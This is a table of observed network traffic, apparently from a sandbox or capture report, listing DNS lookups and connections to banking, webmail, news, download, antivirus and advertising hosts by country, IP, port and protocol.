| US | 8.8.8.8:53 | 210.250.97.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.150.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chase.com | udp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 8.8.8.8:53 | www.chase.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| NL | 104.110.240.99:443 | www.chase.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 60.44.53.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.240.110.104.in-addr.arpa | udp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| US | 159.53.44.60:443 | chase.com | tcp |
| NL | 104.110.240.99:443 | www.chase.com | tcp |
| NL | 104.110.240.99:80 | www.chase.com | tcp |
| US | 8.8.8.8:53 | mail.google.com | udp |
| DE | 172.217.23.197:443 | mail.google.com | tcp |
| DE | 172.217.23.197:443 | mail.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | office.com | udp |
| US | 13.107.6.156:443 | office.com | tcp |
| US | 8.8.8.8:53 | www.office.com | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| US | 8.8.8.8:53 | 197.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.23.217.172.in-addr.arpa | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 156.6.107.13.in-addr.arpa | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| US | 8.8.8.8:53 | res.cdn.office.net | udp |
| NL | 104.110.240.65:443 | res.cdn.office.net | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | www.craigslist.org | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 208.82.238.225:443 | www.craigslist.org | tcp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | yt3.googleusercontent.com | udp |
| NL | 172.217.168.225:443 | yt3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 65.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.237.82.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.238.82.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | tcp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | tcp |
| US | 208.82.238.225:443 | www.craigslist.org | tcp |
| NL | 209.85.226.39:443 | rr2---sn-5hnekn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.226.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 208.82.237.129:443 | craigslist.org | tcp |
| US | 8.8.8.8:53 | cnn.com | udp |
| US | 151.101.67.5:443 | cnn.com | tcp |
| US | 8.8.8.8:53 | www.cnn.com | udp |
| US | 151.101.3.5:443 | www.cnn.com | tcp |
| US | 8.8.8.8:53 | edition.cnn.com | udp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | 5.67.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.3.101.151.in-addr.arpa | udp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 151.101.3.5:443 | edition.cnn.com | tcp |
| US | 151.101.67.5:443 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 54.148.74.134:443 | api-ext.slickdeals.net | tcp |
| US | 8.8.8.8:53 | 134.74.148.54.in-addr.arpa | udp |
| US | 151.101.67.5:80 | edition.cnn.com | tcp |
| US | 8.8.8.8:53 | espn.com | udp |
| US | 18.239.94.102:443 | espn.com | tcp |
| US | 8.8.8.8:53 | www.espn.com | udp |
| NL | 65.9.86.57:443 | www.espn.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 20.112.250.133:443 | microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 57.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.250.112.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | slickdeals.net | udp |
| US | 8.8.8.8:53 | slickdeals.net | udp |
| US | 104.17.126.18:443 | slickdeals.net | tcp |
| US | 8.8.8.8:53 | 163.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.126.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr2---sn-5hnekn7s.googlevideo.com | udp |
| NL | 74.125.100.39:443 | rr2---sn-5hnekn7s.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hne6nzd.googlevideo.com | udp |
| NL | 74.125.100.233:443 | rr4---sn-5hne6nzd.googlevideo.com | udp |
| US | 8.8.8.8:53 | 233.100.125.74.in-addr.arpa | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 20.112.250.133:443 | microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | imgur.com | udp |
| US | 199.232.196.193:443 | imgur.com | tcp |
| US | 8.8.8.8:53 | imdb.com | udp |
| US | 52.94.225.248:443 | imdb.com | tcp |
| US | 8.8.8.8:53 | www.imdb.com | udp |
| DE | 108.138.15.120:443 | www.imdb.com | tcp |
| US | 8.8.8.8:53 | dropbox.com | udp |
| US | 162.125.248.18:443 | dropbox.com | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| US | 162.125.8.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | 193.196.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.225.94.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.15.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.248.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 162.125.248.18:443 | dropbox.com | tcp |
| US | 8.8.8.8:53 | 18.8.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.208.58.216.in-addr.arpa | udp |
| US | 162.125.8.18:443 | www.dropbox.com | tcp |
| NL | 216.58.214.14:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 48.53.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | cfl.dropboxstatic.com | udp |
| US | 104.16.99.29:443 | cfl.dropboxstatic.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| DE | 172.217.23.202:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | 29.99.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | paypal.com | udp |
| US | 64.4.250.37:443 | paypal.com | tcp |
| NL | 142.250.179.202:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | 37.250.4.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | 155.210.229.192.in-addr.arpa | udp |
| US | 64.4.250.37:443 | paypal.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| DE | 172.217.23.202:443 | translate-pa.googleapis.com | udp |
| US | 192.229.210.155:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | salesforce.com | udp |
| US | 23.1.35.132:443 | salesforce.com | tcp |
| NL | 142.250.179.206:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 132.35.1.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.salesforce.com | udp |
| NL | 104.110.240.163:443 | www.salesforce.com | tcp |
| US | 8.8.8.8:53 | 163.240.110.104.in-addr.arpa | udp |
| US | 23.1.35.132:443 | salesforce.com | tcp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| NL | 104.110.240.163:443 | www.salesforce.com | tcp |
| NL | 104.110.240.163:80 | www.salesforce.com | tcp |
| US | 8.8.8.8:53 | apple.com | udp |
| US | 17.253.144.10:443 | apple.com | tcp |
| DE | 184.24.25.242:443 | www.apple.com | tcp |
| US | 17.253.144.10:443 | apple.com | tcp |
| US | 8.8.8.8:53 | tmall.com | udp |
| CN | 59.82.122.115:443 | tmall.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 242.25.24.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.122.82.59.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.144.253.17.in-addr.arpa | tcp |
| US | 8.8.8.8:53 | www.tmall.com | udp |
| NL | 47.246.48.232:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | fixthephoto.com | udp |
| US | 18.239.94.101:443 | fixthephoto.com | tcp |
| NL | 47.246.48.233:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | 232.48.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookie-script.com | udp |
| DE | 116.203.90.127:443 | cdn.cookie-script.com | tcp |
| US | 18.239.94.101:443 | fixthephoto.com | udp |
| US | 8.8.8.8:53 | z-na.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | a.omappapi.com | udp |
| US | 8.8.8.8:53 | a.opmnstr.com | udp |
| IN | 103.180.115.7:443 | a.opmnstr.com | tcp |
| IN | 103.180.115.7:443 | a.opmnstr.com | tcp |
| NL | 13.227.222.145:443 | z-na.amazon-adsystem.com | tcp |
| CN | 59.82.122.115:443 | tmall.com | tcp |
| US | 8.8.8.8:53 | 127.90.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.48.246.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.222.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.115.180.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.34:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| NL | 47.246.48.232:443 | www.tmall.com | tcp |
| US | 8.8.8.8:53 | api.omappapi.com | udp |
| US | 8.8.8.8:53 | aax-us-east.amazon-adsystem.com | udp |
| US | 52.46.154.240:443 | aax-us-east.amazon-adsystem.com | tcp |
| NL | 65.9.86.98:443 | api.omappapi.com | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| NL | 142.251.36.2:443 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | fls-na.amazon-adsystem.com | udp |
| US | 52.94.233.131:443 | fls-na.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | www.dpbolvw.net | udp |
| NL | 89.207.16.75:443 | www.dpbolvw.net | tcp |
| NL | 89.207.16.75:443 | www.dpbolvw.net | tcp |
| US | 8.8.8.8:53 | img.alicdn.com | udp |
| US | 8.8.8.8:53 | cj.dotomi.com | udp |
| NL | 89.207.16.75:443 | cj.dotomi.com | tcp |
| US | 8.8.8.8:53 | www.emjcd.com | udp |
| NL | 89.207.16.75:443 | www.emjcd.com | tcp |
| US | 8.8.8.8:53 | www.kaspersky.com | udp |
| US | 144.121.3.166:443 | www.kaspersky.com | tcp |
| US | 8.8.8.8:53 | 98.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.154.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.233.94.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.16.207.89.in-addr.arpa | udp |
| GB | 79.133.176.252:443 | img.alicdn.com | tcp |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| NL | 142.250.179.170:443 | safebrowsing.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.kaspersky.co.in | udp |
| US | 144.121.3.166:443 | www.kaspersky.co.in | tcp |
| US | 8.8.8.8:53 | sgtm.kaspersky.de | udp |
| US | 8.8.8.8:53 | service.maxymiser.net | udp |
| US | 216.239.38.21:443 | sgtm.kaspersky.de | tcp |
| NL | 88.221.25.131:443 | service.maxymiser.net | tcp |
| US | 8.8.8.8:53 | nytimes.com | udp |
| US | 151.101.1.164:443 | nytimes.com | tcp |
| US | 8.8.8.8:53 | www.nytimes.com | udp |
| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 8.8.8.8:53 | zillow.com | udp |
| NL | 52.222.139.122:443 | zillow.com | tcp |
| US | 8.8.8.8:53 | 166.3.121.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.38.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.zillow.com | udp |
| NL | 13.227.219.64:443 | www.zillow.com | tcp |
| US | 8.8.8.8:53 | content.kaspersky-labs.com | udp |
| US | 8.8.8.8:53 | media.kaspersky.com | udp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.184:443 | media.kaspersky.com | tcp |
| US | 8.8.8.8:53 | pinterest.com | udp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 8.8.8.8:53 | www.pinterest.com | udp |
| NL | 104.85.4.195:443 | www.pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 8.8.8.8:53 | 64.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.3.121.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 8.8.8.8:53 | api-ext.slickdeals.net | udp |
| US | 35.83.134.252:443 | api-ext.slickdeals.net | tcp |
| US | 8.8.8.8:53 | 252.134.83.35.in-addr.arpa | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 64.202.112.223:443 | log.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | versionhistory.googleapis.com | udp |
| NL | 142.250.179.138:443 | versionhistory.googleapis.com | tcp |
| US | 107.178.240.159:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| US | 34.214.72.61:443 | api.keen.io | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| NL | 142.251.36.1:443 | lh3.googleusercontent.com | udp |
| US | 104.36.113.112:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 34.228.209.226:443 | bcp.crwdcntrl.net | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| US | 8.8.8.8:53 | bpi.rtactivate.com | udp |
| US | 54.147.253.182:443 | bpi.rtactivate.com | tcp |
| US | 54.80.176.98:443 | i.liadm.com | tcp |
| US | 8.8.8.8:53 | 182.253.147.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.176.80.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| NL | 172.217.132.74:443 | rr5---sn-5hne6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-5hneknee.googlevideo.com | udp |
| NL | 74.125.8.70:443 | rr1---sn-5hneknee.googlevideo.com | udp |
| US | 8.8.8.8:53 | 74.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.8.125.74.in-addr.arpa | udp |
| US | 34.192.189.203:443 | i6.liadm.com | tcp |
| NL | 172.217.168.196:80 | www.google.com | tcp |
| NL | 172.217.168.196:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | rr5---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.202:443 | rr5---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | featureflags.lavasoft.com | udp |
| US | 104.17.9.52:443 | featureflags.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 203.189.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flwadw.com | udp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | rr5---sn-5hnekn76.googlevideo.com | udp |
| NL | 209.85.226.10:443 | rr5---sn-5hnekn76.googlevideo.com | udp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | rr1---sn-5hne6nsr.googlevideo.com | udp |
| NL | 172.217.132.70:443 | rr1---sn-5hne6nsr.googlevideo.com | udp |
| US | 8.8.8.8:53 | 70.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hneknes.googlevideo.com | udp |
| NL | 74.125.8.200:443 | rr3---sn-5hneknes.googlevideo.com | udp |
| US | 8.8.8.8:53 | livepix.gg | udp |
| US | 76.76.21.21:443 | livepix.gg | tcp |
| US | 8.8.8.8:53 | 21.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.livepix.gg | udp |
| US | 76.76.21.21:443 | livepix.gg | tcp |
| NL | 13.227.219.24:443 | static.livepix.gg | tcp |
| US | 8.8.8.8:53 | 24.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | webservice.livepix.gg | udp |
| US | 104.22.78.129:443 | webservice.livepix.gg | tcp |
| US | 8.8.8.8:53 | unleash.livepix.gg | udp |
| US | 104.22.78.129:443 | unleash.livepix.gg | tcp |
| US | 8.8.8.8:53 | platform.illow.io | udp |
| NL | 13.227.219.24:443 | static.livepix.gg | udp |
| NL | 52.222.139.16:443 | platform.illow.io | tcp |
| NL | 13.227.219.24:443 | static.livepix.gg | udp |
| US | 104.22.78.129:443 | unleash.livepix.gg | udp |
| US | 172.67.42.236:443 | unleash.livepix.gg | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | auth.livepix.gg | udp |
| US | 8.8.8.8:53 | api.platform.illow.io | udp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| DE | 18.195.161.78:443 | api.platform.illow.io | tcp |
| US | 8.8.8.8:53 | 129.78.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.42.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.161.195.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nsk.googlevideo.com | udp |
| NL | 172.217.132.39:443 | rr2---sn-5hne6nsk.googlevideo.com | udp |
| US | 8.8.8.8:53 | 39.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnekn7s.googlevideo.com | udp |
| NL | 74.125.100.40:443 | rr3---sn-5hnekn7s.googlevideo.com | udp |
| US | 8.8.8.8:53 | 40.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hneknek.googlevideo.com | udp |
| NL | 74.125.8.138:443 | rr5---sn-5hneknek.googlevideo.com | udp |
| US | 8.8.8.8:53 | 138.8.125.74.in-addr.arpa | udp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | udp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| NL | 74.125.8.103:443 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| US | 8.8.8.8:53 | 103.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| NL | 142.251.36.34:443 | www.googletagservices.com | tcp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 142.251.36.42:443 | content-autofill.googleapis.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 74.125.8.103:443 | rr2---sn-5hne6nzs.googlevideo.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.54.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | optimizationguide-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.149.207.94:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| NL | 142.250.179.206:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 94.207.149.54.in-addr.arpa | udp |
| NL | 157.240.247.35:443 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 216.239.38.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 181.38.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| DE | 172.217.23.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | translate-pa.googleapis.com | udp |
| NL | 142.251.36.42:443 | translate-pa.googleapis.com | tcp |
| US | 104.16.54.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.16.53.48:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| US | 104.26.6.139:443 | btloader.com | tcp |
| US | 54.149.207.94:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 34.107.148.139:443 | prebid.media.net | tcp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 34.237.83.209:443 | btlr.sharethrough.com | tcp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 8.8.8.8:53 | 209.83.237.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 74.119.119.131:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | 9f0e855800c7be1875206c783afb8546.safeframe.googlesyndication.com | udp |
| NL | 52.222.139.7:443 | tags.crwdcntrl.net | tcp |
| NL | 142.250.179.161:443 | 9f0e855800c7be1875206c783afb8546.safeframe.googlesyndication.com | tcp |
| US | 18.239.100.78:443 | cdn.prod.uidapi.com | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
